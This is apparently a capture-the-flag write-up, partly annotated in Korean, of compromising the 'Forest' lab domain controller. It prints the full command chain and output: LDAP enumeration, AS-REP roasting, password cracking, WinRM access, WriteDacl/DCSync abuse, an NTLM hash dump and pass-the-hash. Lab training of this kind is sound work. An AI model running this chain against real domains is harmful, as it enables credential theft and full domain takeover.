Proof of Concept
10.129.8.14
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldapInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Forest]
└─$ nxc smb 10.129.8.14 --generate-hosts-file hosts
SMB 10.129.8.14 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
┌──(kali㉿kali)-[~/Forest]
└─$ cat hosts
10.129.8.14 FOREST.htb.local htb.local FOREST/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Forest]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.8.14 FOREST.htb.local htb.local FORESTInitial Access
Null Session Ldap 정보 수집
┌──(kali㉿kali)-[~/Forest]
└─$ ldapsearch -x -H ldap://10.129.8.14 -D '' -w '' -b "DC=htb,DC=local" | tee ldapsearch
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20260225170336.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
<SNIP>수집한 LDAP 정보에서 사용자명 필터링하여 userlist.txt 파일 생성
┌──(kali㉿kali)-[~/Forest]
└─$ cat ldapsearch | grep 'dn: CN=' | cut -d '=' -f 2 | cut -d ',' -f 1 | uniq > userlist.txtAS-REP Roasting을 통해 pre-auth 비활성화 계정 탐색 결과 svc-alfresco 사용자가 비활성화 되어있었으며, 해당 사용자의 해시 획득
┌──(kali㉿kali)-[~/Forest]
└─$ nxc ldap htb.local -u userlist.txt -p '' --asreproast asreproast.hash
LDAP 10.129.8.14 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
<SNIP>
LDAP 10.129.8.14 389 FOREST $krb5asrep$23$svc-alfresco@HTB.LOCAL:6ae9c9f706865932c879fe5784ff399f$75d1f6040ad0e86bf050f31eeeda64d950e51f35fc755d631cbeabd8cf1216a060858489cb69ea4e9d6b0804f95a2eeeb8ea80857ee7b39b6b3c644824f517fdcf7c4a1aa111ef863352919ae0835d18dedd2cbafc29013ed7ffb9ec16d53e8824163796abb511c1cb21022ce0277c2e77b07654b81564829710125641192d4e24222f2e4a84179e3008a9548ff5a267091936ffba3efbd047b537be3de44d84e78df884bdde1beb930c317166d1df84411b6b4b52a7e4f9990e296bd9e56ca0cff9362090c74444eb599d6b6e3e4eaf878c86eb1dd241ab063f8f32f9045b66ae11072bef4e
<SNIP>svc-alfresco 사용자 해시 크랙하여 평문 비밀번호 획득
- svc-alfresco:s3rvice
┌──(kali㉿kali)-[~/Forest]
└─$ hashcat asreproast.hash /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6ae9c9f706865932c879fe5784ff399f$75d1f6040ad0e86bf050f31eeeda64d950e51f35fc755d631cbeabd8cf1216a060858489cb69ea4e9d6b0804f95a2eeeb8ea80857ee7b39b6b3c644824f517fdcf7c4a1aa111ef863352919ae0835d18dedd2cbafc29013ed7ffb9ec16d53e8824163796abb511c1cb21022ce0277c2e77b07654b81564829710125641192d4e24222f2e4a84179e3008a9548ff5a267091936ffba3efbd047b537be3de44d84e78df884bdde1beb930c317166d1df84411b6b4b52a7e4f9990e296bd9e56ca0cff9362090c74444eb599d6b6e3e4eaf878c86eb1dd241ab063f8f32f9045b66ae11072bef4e:s3rvice알아낸 svc-alfresco 계정 정보를 이용하여 WinRM 접속
┌──(kali㉿kali)-[~/Forest]
└─$ evil-winrm -i htb.local -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>Read user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
31b21d9b8e600ee94b266ae70f9d243d
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::84
IPv6 Address. . . . . . . . . . . : dead:beef::c6e:5b2f:ba39:cb18
Link-local IPv6 Address . . . . . : fe80::c6e:5b2f:ba39:cb18%5
IPv4 Address. . . . . . . . . . . : 10.129.8.14
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htbPrivilege Escalation
BloodHound 정보 수집
┌──(kali㉿kali)-[~/Forest]
└─$ bloodhound-python -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' -c All -ns 10.129.8.14 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Testing resolved hostname connectivity dead:beef::84
INFO: Trying LDAP connection to dead:beef::84
INFO: Testing resolved hostname connectivity dead:beef::c6e:5b2f:ba39:cb18
INFO: Trying LDAP connection to dead:beef::c6e:5b2f:ba39:cb18
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Testing resolved hostname connectivity dead:beef::84
INFO: Trying LDAP connection to dead:beef::84
INFO: Testing resolved hostname connectivity dead:beef::c6e:5b2f:ba39:cb18
INFO: Trying LDAP connection to dead:beef::c6e:5b2f:ba39:cb18
INFO: Found 32 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 21S
INFO: Compressing output into 20260226080736_bloodhound.zipChecked BloodHound
- “svc-alfresco” is member of group “ACCOUNT OPERATORS”, which have permission have GenericAll permissions to the group “EXCHANGE WINDOWS PERMISSIONS”
- The group “EXCHANGE WINDOWS PERMISSIONS” have “WriteDacl” permissions to modify the DACL (Discretionary Access Control List) on the domain HTB.LOCAL
Added the user to the target group “EXCHANGE WINDOWS PERMISSIONS”. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:
*Evil-WinRM* PS C:\> net group "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco" /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\> net user svc-alfresco /domain
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/26/2026 5:27:09 AM
Password expires Never
Password changeable 2/27/2026 5:27:09 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/26/2026 5:07:45 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Exchange Windows Perm*Domain Users
*Service Accounts
The command completed successfully.To abuse WriteDacl to a domain object, granted svc-alfresco the DcSync permissions.
┌──(kali㉿kali)-[~/Forest]
└─$ impacket-dacledit -action 'write' -rights 'DCSync' -principal 'svc-alfresco' -target-dn 'DC=htb,DC=local' 'htb.local/svc-alfresco:s3rvice'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260226-083429.bak
[*] DACL modified successfully!
Dumped administrator’s NTLM hashes
┌──(kali㉿kali)-[~/Forest]
└─$ impacket-secretsdump 'svc-alfresco':'s3rvice'@'htb.local'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...Accessed to WinRM service using administrator’s NTLM hash
┌──(kali㉿kali)-[~/Forest]
└─$ evil-winrm -i htb.local -u 'administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
11809c64ea09fcf472ab8b7b205fe6f4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::84
IPv6 Address. . . . . . . . . . . : dead:beef::c6e:5b2f:ba39:cb18
Link-local IPv6 Address . . . . . : fe80::c6e:5b2f:ba39:cb18%5
IPv4 Address. . . . . . . . . . . : 10.129.8.14
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb